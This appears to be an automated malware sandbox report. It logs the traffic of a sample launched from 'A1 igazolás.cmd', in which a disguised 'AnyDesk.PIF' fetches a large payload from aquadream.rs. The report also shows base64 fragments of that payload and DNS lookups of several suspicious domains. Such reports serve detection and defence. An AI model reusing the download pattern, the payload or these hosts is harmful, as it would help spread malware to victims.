Nov 27, 2024 13:22:15.857386112 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:15.859956980 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:15.859965086 CET | 443 | 49706 | 185.102.77.43 | 192.168.2.8
Nov 27, 2024 13:22:15.860225916 CET | 443 | 49706 | 185.102.77.43 | 192.168.2.8
Nov 27, 2024 13:22:15.906609058 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:15.910270929 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:15.955343962 CET | 443 | 49706 | 185.102.77.43 | 192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422772884 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422797918 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422805071 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422847033 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.422861099 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.422877073 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.464633942 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.521800995 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.521811008 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.521840096 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.521895885 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.521961927 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.624166012 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.624176025 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.624234915 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.649373055 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.649379969 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.649451971 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.682934999 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.682943106 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.682997942 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.683043003 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.721307039 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.721379042 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.816149950 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.816404104 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.832870007 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.833175898 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.846570969 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.846808910 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.864449978 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.864609957 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.874861002 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.874949932 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.883163929 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.883239985 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.932704926 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.932843924 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:16.941596031 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:16.941696882 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.015115976 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.015197039 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.025475025 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.025621891 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.033179998 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.033272028 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.041534901 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.041621923 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.048827887 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.048908949 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.059134007 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.059220076 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.065083027 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.065160036 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.071249962 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.071337938 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.076630116 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.076704979 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.084156036 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.084232092 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.127161980 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.127270937 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.133836031 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.133943081 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.139306068 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.139398098 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.215012074 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.215221882 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.219110012 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.219192982 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.223717928 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.223884106 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.229712963 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.229779959 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.233931065 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.234035015 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.238516092 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.238584995 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.243010044 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.243088007 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.248789072 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.248861074 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.253261089 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.253344059 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.258460999 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.258527994 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.262945890 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.263020039 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.266457081 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.266551971 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.330703974 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.330856085 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.333426952 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.333528996 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.337060928 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.337137938 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.413208961 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.413320065 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.416529894 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.416613102 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.419856071 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.419929981 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.422437906 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.422629118 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.426599979 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.426671982 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.429785013 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.429857969 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.433190107 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.433268070 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.438838959 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.438966990 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.441067934 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.441154003 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.444658041 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.444744110 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.447865963 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.447942972 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.451034069 CET44349706185.102.77.43192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 13:22:13.126774073 CET | 192.168.2.8 | 1.1.1.1 | 0xff8a | Standard query (0) | aquadream.rs | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:00.085829020 CET | 192.168.2.8 | 1.1.1.1 | 0xddfd | Standard query (0) | www.ustavoglins.store | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:20.084678888 CET | 192.168.2.8 | 1.1.1.1 | 0x43db | Standard query (0) | www.estspacefox.shop | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:39.522061110 CET | 192.168.2.8 | 1.1.1.1 | 0xb78c | Standard query (0) | www.ebsiteclients.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:59.678164005 CET | 192.168.2.8 | 1.1.1.1 | 0x1620 | Standard query (0) | www.rnuah.xyz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:24:20.180763960 CET | 192.168.2.8 | 1.1.1.1 | 0xa302 | Standard query (0) | www.atingdilse.site | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:24:40.632680893 CET | 192.168.2.8 | 1.1.1.1 | 0xa08e | Standard query (0) | www.askabirokulmumkun.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:25:01.084328890 CET | 192.168.2.8 | 1.1.1.1 | 0x1f3f | Standard query (0) | www.ultangaziescortbayanlari.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:25:22.010665894 CET | 192.168.2.8 | 1.1.1.1 | 0xdbc | Standard query (0) | www.yzsports200.xyz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:25:43.407754898 CET | 192.168.2.8 | 1.1.1.1 | 0x8443 | Standard query (0) | www.evelupcasino.club | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:26:26.568842888 CET | 192.168.2.8 | 1.1.1.1 | 0xd6e5 | Standard query (0) | www.trl-migrate.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:26:46.943116903 CET | 192.168.2.8 | 1.1.1.1 | 0x6feb | Standard query (0) | www.9838.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 13:22:13.774569035 CET | 1.1.1.1 | 192.168.2.8 | 0xff8a | No error (0) | aquadream.rs |  | 185.102.77.43 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:00.345024109 CET | 1.1.1.1 | 192.168.2.8 | 0xddfd | Name error (3) | www.ustavoglins.store | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:20.309747934 CET | 1.1.1.1 | 192.168.2.8 | 0x43db | Name error (3) | www.estspacefox.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:23:39.742459059 CET | 1.1.1.1 | 192.168.2.8 | 0xb78c | Name error (3) | www.ebsiteclients.online | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:24:00.002156019 CET | 1.1.1.1 | 192.168.2.8 | 0x1620 | Name error (3) | www.rnuah.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:24:20.492485046 CET | 1.1.1.1 | 192.168.2.8 | 0xa302 | Name error (3) | www.atingdilse.site | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:24:40.860418081 CET | 1.1.1.1 | 192.168.2.8 | 0xa08e | Name error (3) | www.askabirokulmumkun.online | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:25:01.324996948 CET | 1.1.1.1 | 192.168.2.8 | 0x1f3f | Name error (3) | www.ultangaziescortbayanlari.online | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:25:22.249058008 CET | 1.1.1.1 | 192.168.2.8 | 0xdbc | Name error (3) | www.yzsports200.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:25:43.708264112 CET | 1.1.1.1 | 192.168.2.8 | 0x8443 | Name error (3) | www.evelupcasino.club | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:26:26.793922901 CET | 1.1.1.1 | 192.168.2.8 | 0xd6e5 | Name error (3) | www.trl-migrate.online | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 13:26:47.190737009 CET | 1.1.1.1 | 192.168.2.8 | 0x6feb | Name error (3) | www.9838.xyz | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                      • aquadream.rs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 185.102.77.43 | 443 | 8064 | C:\Users\Public\Libraries\AnyDesk.PIF

Timestamp | Bytes transferred | Direction | Data
2024-11-27 12:22:15 UTC | 161 | OUT | GET /244_Ipkokioahlp HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: aquadream.rs
2024-11-27 12:22:16 UTC | 201 | IN | HTTP/1.1 200 OK
    Date: Wed, 27 Nov 2024 12:22:16 GMT
    Server: Apache
    Last-Modified: Tue, 26 Nov 2024 09:38:57 GMT
    Accept-Ranges: bytes
    Content-Length: 659232
    Vary: User-Agent
    Connection: close
2024-11-27 12:22:16 UTC | 7991 | IN | Data Raw: (hex/ASCII payload dump not reproduced)
2024-11-27 12:22:16 UTC | 8000 | IN | Data Raw: (hex/ASCII payload dump not reproduced)
2024-11-27 12:22:16 UTC | 8000 | IN | Data Raw: (hex/ASCII payload dump not reproduced)
2024-11-27 12:22:16 UTC | 8000 | IN | Data Raw: (hex/ASCII payload dump not reproduced)
                                                                                                                                                                      Data Ascii: WUO9EQvuAcCSgyBq8fOMr55FzQ9O9+5YlTHxnvx/Rp3wj8XhlTqvH0yCPdZjlMxWmVpjOn3myPCsb5l1omQ2Hz/bszFe6ZywxmtMR68mmxdVnBBVm6DcJG/jeNwRgmUOAWCDiFmseFTDuMwRbX3qiO69uLhqqlrL5bPyMPzlZn63/CqX0ONvod+EeGcHYllcaHUG3B7B+xLeYYzU8lxiepKtNPLvsBdqd8vJRsO1xQ6lRbkXAAZwlD4qdQjPWTx
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 78 4f 61 38 35 38 61 4b 50 44 43 68 79 30 41 2b 52 50 74 57 79 42 78 49 55 61 50 35 4a 50 51 6b 47 75 62 61 31 72 36 5a 78 38 64 62 2f 50 41 5a 50 4c 78 73 76 4f 61 34 57 4a 68 63 42 30 78 45 31 79 32 33 39 35 37 63 46 59 4a 30 59 6b 44 78 30 32 70 2f 6b 45 56 7a 48 75 5a 6e 69 57 79 52 41 39 30 36 33 33 59 58 75 49 4d 39 63 55 6f 4c 4e 6d 4e 32 70 31 63 7a 30 55 52 39 33 74 35 75 71 4a 67 63 6c 39 54 42 2f 55 32 33 4b 6c 32 6a 33 43 41 4c 72 5a 77 6e 69 78 77 6f 56 41 32 44 42 62 4c 4b 35 66 55 62 46 38 30 64 53 71 65 6e 34 63 54 53 4c 4b 43 4e 33 46 32 44 64 6f 2f 58 46 52 73 7a 4c 4a 62 38 55 2f 6c 41 72 61 45 55 6d 4c 66 71 43 2b 67 75 7a 76 75 39 74 59 44 7a 64 70 32 64 64 6a 4a 49 39 2f 30 70 48 2b 48 39 57 36 6d 76 68 37 33 76 47 59 79 48 41 6e 4c
                                                                                                                                                                      Data Ascii: xOa858aKPDChy0A+RPtWyBxIUaP5JPQkGuba1r6Zx8db/PAZPLxsvOa4WJhcB0xE1y23957cFYJ0YkDx02p/kEVzHuZniWyRA90633YXuIM9cUoLNmN2p1cz0UR93t5uqJgcl9TB/U23Kl2j3CALrZwnixwoVA2DBbLK5fUbF80dSqen4cTSLKCN3F2Ddo/XFRszLJb8U/lAraEUmLfqC+guzvu9tYDzdp2ddjJI9/0pH+H9W6mvh73vGYyHAnL
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 4c 48 4e 74 32 4d 59 73 79 78 4a 73 52 66 63 79 6e 44 4c 50 38 4b 4e 61 71 73 69 58 69 42 61 68 6d 36 61 39 58 38 53 32 67 77 68 35 42 69 59 69 73 59 4f 58 77 43 6d 38 5a 44 2b 57 48 53 77 76 76 48 56 30 43 30 35 69 4a 71 57 6d 6b 31 33 64 48 6a 36 4e 34 43 34 69 6d 51 43 77 79 6f 46 48 64 6a 6f 78 31 59 6b 76 62 6c 72 69 39 52 63 43 49 37 4d 4a 47 6c 39 4d 6c 61 4d 61 56 58 42 64 67 53 48 34 32 6c 2b 37 4c 6f 43 79 32 4b 6e 67 57 4d 47 6a 49 56 64 66 62 76 74 45 5a 37 32 31 64 6d 6e 35 76 4e 6f 7a 56 42 58 4a 67 75 54 4c 73 4e 39 39 76 6b 49 2f 30 55 6a 76 6a 7a 54 62 58 78 46 32 58 51 44 55 38 31 37 62 70 75 46 76 4f 50 78 78 37 4d 37 38 70 78 65 6e 37 79 64 6c 62 79 30 4e 43 56 63 69 37 4a 57 6b 34 33 67 2f 71 38 4b 72 51 55 5a 4f 50 6d 37 4f 44 6e 30
                                                                                                                                                                      Data Ascii: LHNt2MYsyxJsRfcynDLP8KNaqsiXiBahm6a9X8S2gwh5BiYisYOXwCm8ZD+WHSwvvHV0C05iJqWmk13dHj6N4C4imQCwyoFHdjox1Ykvblri9RcCI7MJGl9MlaMaVXBdgSH42l+7LoCy2KngWMGjIVdfbvtEZ721dmn5vNozVBXJguTLsN99vkI/0UjvjzTbXxF2XQDU817bpuFvOPxx7M78pxen7ydlby0NCVci7JWk43g/q8KrQUZOPm7ODn0
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 4d 64 7a 33 74 78 77 47 70 79 74 76 79 44 61 51 44 74 44 70 66 6f 57 30 49 66 59 2b 41 39 36 6f 6e 33 77 6b 39 44 6b 42 4b 42 4d 4e 6d 38 35 53 67 6f 63 32 74 31 47 33 62 34 72 4d 6d 48 43 6b 63 38 56 63 56 47 66 36 6f 52 53 44 71 65 31 48 57 74 4c 76 32 53 63 5a 30 59 59 31 59 64 53 75 48 30 6b 6b 55 56 78 75 79 76 53 6a 6e 33 6b 6a 74 65 61 64 36 33 70 6b 4d 4e 4e 78 39 71 42 36 34 6f 6f 62 49 71 77 75 4c 63 32 6d 43 76 49 72 68 71 39 36 61 71 48 58 4e 61 37 63 55 49 64 6f 51 35 6f 35 4f 79 74 71 35 54 38 66 38 58 2b 4b 46 32 75 5a 49 61 64 45 54 54 38 6b 2f 45 67 6e 50 47 53 64 58 48 4f 64 34 77 47 67 77 4f 36 48 67 66 49 33 34 4a 50 46 38 41 36 4a 33 44 6a 73 33 75 5a 6f 4c 56 42 75 66 72 48 34 61 45 49 63 37 73 52 4f 53 53 6d 6c 78 75 77 70 77 75 46
                                                                                                                                                                      Data Ascii: Mdz3txwGpytvyDaQDtDpfoW0IfY+A96on3wk9DkBKBMNm85Sgoc2t1G3b4rMmHCkc8VcVGf6oRSDqe1HWtLv2ScZ0YY1YdSuH0kkUVxuyvSjn3kjtead63pkMNNx9qB64oobIqwuLc2mCvIrhq96aqHXNa7cUIdoQ5o5Oytq5T8f8X+KF2uZIadETT8k/EgnPGSdXHOd4wGgwO6HgfI34JPF8A6J3Djs3uZoLVBufrH4aEIc7sROSSmlxuwpwuF
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 61 62 38 61 46 38 61 74 45 7a 35 75 78 36 69 67 63 68 66 4d 54 79 5a 56 37 59 4a 78 56 5a 51 4b 50 4e 6f 38 66 72 74 34 6f 33 69 70 6b 47 52 37 51 32 72 71 38 30 4b 37 2f 4f 65 73 67 33 32 77 38 2f 6e 52 78 72 62 38 75 44 7a 35 38 66 68 4f 31 63 75 6b 6c 79 35 63 4d 67 50 62 6e 61 34 4c 33 4d 41 72 70 47 53 4a 78 50 33 67 33 56 4e 69 54 51 58 58 61 52 43 36 71 62 45 75 78 47 6f 59 70 67 6a 52 4f 4c 76 43 34 75 37 51 35 64 57 49 47 66 45 6f 47 51 6a 58 66 71 57 52 54 64 72 52 58 4d 72 6e 50 30 67 30 4c 74 42 69 4b 54 77 6a 69 71 75 52 6f 4d 59 4e 67 2b 71 2f 67 43 30 6d 4c 6f 72 6d 64 4b 35 79 34 6a 57 61 74 45 72 4a 54 67 6b 33 4b 51 6c 4b 6a 33 79 50 74 5a 52 2f 6d 42 4e 35 51 54 4f 67 6f 6a 47 54 51 59 49 4c 65 55 4a 43 51 64 42 55 45 4c 56 58 56 33 32
                                                                                                                                                                      Data Ascii: ab8aF8atEz5ux6igchfMTyZV7YJxVZQKPNo8frt4o3ipkGR7Q2rq80K7/Oesg32w8/nRxrb8uDz58fhO1cukly5cMgPbna4L3MArpGSJxP3g3VNiTQXXaRC6qbEuxGoYpgjROLvC4u7Q5dWIGfEoGQjXfqWRTdrRXMrnP0g0LtBiKTwjiquRoMYNg+q/gC0mLormdK5y4jWatErJTgk3KQlKj3yPtZR/mBN5QTOgojGTQYILeUJCQdBUELVXV32
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 53 4d 2b 37 2f 78 59 52 6e 32 52 42 6d 43 64 36 4d 76 46 6e 58 42 4a 6a 32 2f 4b 2b 35 4c 4f 69 58 47 35 48 46 36 6e 4f 77 30 76 66 6b 36 63 59 4a 4c 67 39 63 39 6c 30 66 63 51 6c 6c 6b 67 6e 61 47 31 31 76 4d 73 44 41 67 48 35 61 45 68 44 58 6a 45 77 30 47 35 62 77 61 42 34 45 4b 35 42 62 37 4c 38 64 78 71 59 72 4b 61 74 55 66 77 33 2b 30 69 45 7a 49 53 39 70 46 65 33 42 49 4d 33 76 44 6d 58 30 45 74 43 50 53 50 66 30 56 4c 61 4e 57 4b 67 6e 4c 34 6d 58 6f 65 53 4a 79 53 70 37 6d 32 2b 6d 53 65 4b 49 6b 57 78 65 42 65 43 33 5a 77 58 51 34 6e 30 32 33 70 39 65 7a 2b 69 53 4f 54 52 61 58 67 74 79 7a 49 73 32 62 34 75 74 54 57 75 34 50 50 51 62 37 59 69 55 36 41 71 72 52 4f 32 35 44 59 35 6c 6d 49 70 4d 63 5a 62 4e 4f 50 37 4c 73 5a 69 75 54 6b 67 37 4a 59
                                                                                                                                                                      Data Ascii: SM+7/xYRn2RBmCd6MvFnXBJj2/K+5LOiXG5HF6nOw0vfk6cYJLg9c9l0fcQllkgnaG11vMsDAgH5aEhDXjEw0G5bwaB4EK5Bb7L8dxqYrKatUfw3+0iEzIS9pFe3BIM3vDmX0EtCPSPf0VLaNWKgnL4mXoeSJySp7m2+mSeKIkWxeBeC3ZwXQ4n023p9ez+iSOTRaXgtyzIs2b4utTWu4PPQb7YiU6AqrRO25DY5lmIpMcZbNOP7LsZiuTkg7JY
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 77 56 49 34 4b 31 70 76 6d 38 78 72 68 65 38 65 55 74 55 46 6a 35 41 47 38 42 34 46 42 46 64 76 4b 77 53 64 73 44 39 63 35 68 4f 66 49 54 45 67 59 57 63 54 73 64 2f 49 6b 50 52 33 52 6a 44 66 6f 4d 52 4a 64 62 54 6b 56 75 54 4a 65 43 6e 58 66 2b 6a 73 6a 44 62 63 50 38 6c 31 50 57 4e 36 5a 77 62 75 7a 59 66 6c 58 69 45 56 77 61 49 56 59 49 6d 57 52 5a 70 48 37 53 78 41 44 39 38 57 63 6a 44 4c 79 47 62 74 36 79 51 64 76 63 49 4e 35 61 75 73 6d 4c 68 78 30 43 4f 76 72 78 44 39 39 42 63 2f 58 68 6e 50 56 45 48 50 52 48 33 42 5a 69 43 65 52 59 6a 34 62 70 78 77 4f 2b 74 56 57 4a 48 7a 48 63 42 31 36 4b 4f 45 6e 57 6d 35 57 33 47 44 34 41 32 31 72 41 74 73 72 6a 30 61 49 34 70 55 7a 4b 78 71 4b 73 4a 79 63 56 6c 6d 44 2f 37 4b 4b 35 42 68 4c 79 71 4e 2b 4c 53
                                                                                                                                                                      Data Ascii: wVI4K1pvm8xrhe8eUtUFj5AG8B4FBFdvKwSdsD9c5hOfITEgYWcTsd/IkPR3RjDfoMRJdbTkVuTJeCnXf+jsjDbcP8l1PWN6ZwbuzYflXiEVwaIVYImWRZpH7SxAD98WcjDLyGbt6yQdvcIN5ausmLhx0COvrxD99Bc/XhnPVEHPRH3BZiCeRYj4bpxwO+tVWJHzHcB16KOEnWm5W3GD4A21rAtsrj0aI4pUzKxqKsJycVlmD/7KK5BhLyqN+LS



                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:07:22:07
                                                                                                                                                                      Start date:27/11/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "
                                                                                                                                                                      Imagebase:0x7ff65bdb0000
                                                                                                                                                                      File size:289'792 bytes
